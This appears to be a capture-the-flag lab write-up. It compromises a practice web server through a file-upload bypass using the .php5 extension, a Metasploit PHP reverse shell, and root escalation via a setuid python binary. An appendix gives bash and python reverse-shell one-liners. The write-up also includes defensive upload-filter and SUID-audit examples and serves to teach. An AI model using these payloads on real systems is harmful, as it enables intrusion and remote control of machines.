
Root Me WriteUp
Topics covered:
Python privilege escalation, file upload filter bypass
Penetration process:
Scan the target host for open ports with nmap:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate 10000 10.10.131.120
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:29 EST
Nmap scan report for 10.10.131.120
Host is up (0.20s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p22,80 --min-rate 10000 10.10.131.120
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:30 EST
Nmap scan report for 10.10.131.120
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 --min-rate 10000 10.10.131.120
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 03:30 EST
Nmap scan report for 10.10.131.120
Host is up (0.19s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Nmap done: 1 IP address (1 host up) scanned in 35.90 seconds
The port scan shows that the host exposes two ports, 22 and 80, that it runs Ubuntu Linux, and that port 80 is served by Apache/2.4.29. (Note: Apache is usually paired with PHP, IIS with ASP or ASPX, and Tomcat with JSP.)
Visit the page on port 80. View the page source:
Nothing special turns up, so continue with directory brute-forcing against the target host to see whether anything new appears:
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://10.10.131.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
[sudo] password for kali:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.131.120
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 316] [--> http://10.10.131.120/uploads/]
/css (Status: 301) [Size: 312] [--> http://10.10.131.120/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.131.120/js/]
/panel (Status: 301) [Size: 314] [--> http://10.10.131.120/panel/]
/server-status (Status: 403) [Size: 278]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$
Directory brute-forcing reveals the /uploads, /css, /js, /panel and /server-status directories. Visiting them shows that /panel is a file upload page and /uploads is where uploaded files can be retrieved. We try to upload a .php webshell, then request the uploaded PHP file to obtain a reverse shell on the target host. First, generate the PHP payload with msfvenom:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.141.149 LPORT=4444 -f raw > rev.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34851 bytes
┌──(kali㉿kali)-[~]
└─$
After generating the payload, try uploading the PHP file: the server refuses .php uploads. Capture the request with Burp Suite and try modifying the Content-Type, changing the extension's case, encoding, null-byte truncation, a doubled extension, a trailing space, uploading a JPG and then rewriting the name to PHP in the intercepted request, uncommon extensions such as php3 and php4, and disabling the front-end JavaScript validation. The result: a file with the uncommon .php5 extension is accepted and is executed normally.
Open msf, set the payload and start the listener:
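The filter that failed above refuses the literal ".php" suffix but lets ".php5" through. The following added example (not code from the writeup or the target application) models that blocklist beside an allowlist check; the function names, the accepted image extensions and the random storage name are assumptions.

```python
# Added example: blocklist vs. allowlist for upload filenames.
# Function names and IMAGE_EXTENSIONS are assumptions for this example.
import os
import secrets
from typing import Optional

IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def blocklist_allows(filename: str) -> bool:
    """Weak check: only the literal '.php' suffix is refused.

    Any name the web server still maps to the PHP handler but that does
    not end in exactly '.php' (the writeup found '.php5') passes, and so
    does a case variant such as '.PHP'.
    """
    return not filename.endswith(".php")


def allowlist_name(filename: str) -> Optional[str]:
    """Hardened check: accept only known image extensions, compared
    case-insensitively, and return a server-chosen storage name.

    The stored name carries exactly one extension chosen from the
    allowlist, so a client-supplied 'shell.php.jpg' is stored as
    '<random>.jpg' and never keeps a second, executable extension.
    The client's Content-Type header is deliberately not consulted:
    it is attacker-controlled.
    """
    base = os.path.basename(filename)
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_EXTENSIONS:
        return None
    return f"{secrets.token_hex(8)}.{ext}"


def compare(names):
    """Return {name: (blocklist_verdict, allowlist_stored_name)}."""
    return {n: (blocklist_allows(n), allowlist_name(n)) for n in names}
```

In this writeup's terms, `blocklist_allows("rev.php5")` is True while `allowlist_name("rev.php5")` is None.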
┌──(kali㉿kali)-[~]
└─$ msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 10.9.141.149
lhost => 10.9.141.149
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.9.141.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.9.141.149:4444
Gaining a foothold:
Browse to the /uploads page on the target and execute the uploaded file (rev.php5); a reverse shell arrives in msf:
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.9.141.149:4444
[*] Meterpreter session 1 opened (10.9.141.149:4444 -> 10.10.212.28:57938) at 2023-11-12 20:56:24 -0500
meterpreter >
meterpreter > shell
Process 1341 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.4$
Getting the user.txt flag:
Once inside the target host, search for the flag:
bash-4.4$ ls
ls
rev.php5
bash-4.4$ pwd
pwd
/var/www/html/uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
Website.zip css index.php js panel uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
html user.txt
bash-4.4$ cat user.txt
cat user.txt
THM{y0u_g0t_a_sh3ll}
bash-4.4$
After collecting the flag, use find to look for items usable for privilege escalation:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
bash-4.4$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
bash-4.4$
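A defender reviewing a listing like the one above wants to separate the setuid binaries a stock install ships from anything unexpected, and in particular from interpreters or shells, which hand an effective uid of 0 to whoever runs them. This added example (not from the writeup) does that audit; the baseline, the interpreter list and the sample listing are constructed for the example, the baseline is deliberately partial, and `find_suid` is a live check for a real host.

```python
# Added example: audit a SUID listing against a (partial, assumed)
# baseline and flag interpreters/shells. Sample data is constructed.
import os
import stat

# Programs that should never be setuid: each can run arbitrary code
# with the elevated effective uid.
INTERPRETER_NAMES = {"python", "python2", "python3", "perl", "ruby", "php",
                     "node", "bash", "sh", "dash", "zsh", "find", "vim",
                     "vi", "nano", "less", "more", "env"}

# Partial baseline of setuid files expected on a stock Ubuntu 18.04 host.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}


def classify(paths):
    """Split SUID paths into (unexpected, interpreters), both sorted.

    'unexpected' means not in the baseline (review it); 'interpreters'
    means the basename (minus any version suffix such as '3.6') is a
    known interpreter or shell, which is a direct path to root.
    """
    unexpected = sorted(p for p in paths if p not in EXPECTED_SUID)
    interpreters = sorted(
        p for p in paths
        if os.path.basename(p).split(".")[0] in INTERPRETER_NAMES)
    return unexpected, interpreters


def find_suid(root="/"):
    """Live check: return regular files under root with the setuid bit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


# Constructed sample: a subset of the listing above.
SAMPLE = ["/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/python",
          "/usr/bin/at", "/bin/su", "/bin/ping",
          "/usr/lib/openssh/ssh-keysign"]
```

Running `classify(SAMPLE)` puts /usr/bin/python in both lists, which is exactly the finding the writeup exploits next.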
Getting root
The listing shows /usr/bin/python with the setuid bit set, which we can use for privilege escalation, so escalate directly with python:
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
#
Find the last flag:
# cat /root/root.txt
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
#
This completes the privilege escalation.
Summary:
We scanned the target's open ports and found ports 22 and 80. Port 80 is a web service and exposes far more information than port 22, so it was the first target of the test. Visiting port 80 revealed nothing special, so we used gobuster to brute-force directories and look for hidden paths. The scan turned up the upload page /panel and the file directory /uploads. Since the target runs Apache, we uploaded a .php webshell to obtain a shell; after several attempts, a file with the rev.php5 extension was accepted and parsed as PHP. With the shell obtained from the uploaded file, we used find to enumerate privilege escalation candidates, found that python could be used, escalated to root with python, and collected the flag.
Appendix: reverse shell commands via find and via python
# execute via the find command
find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.2.128/9919 0>&1 \;
# python-based reverse shell
find /etc/passwd -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.128",9919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-ip"]);' \;

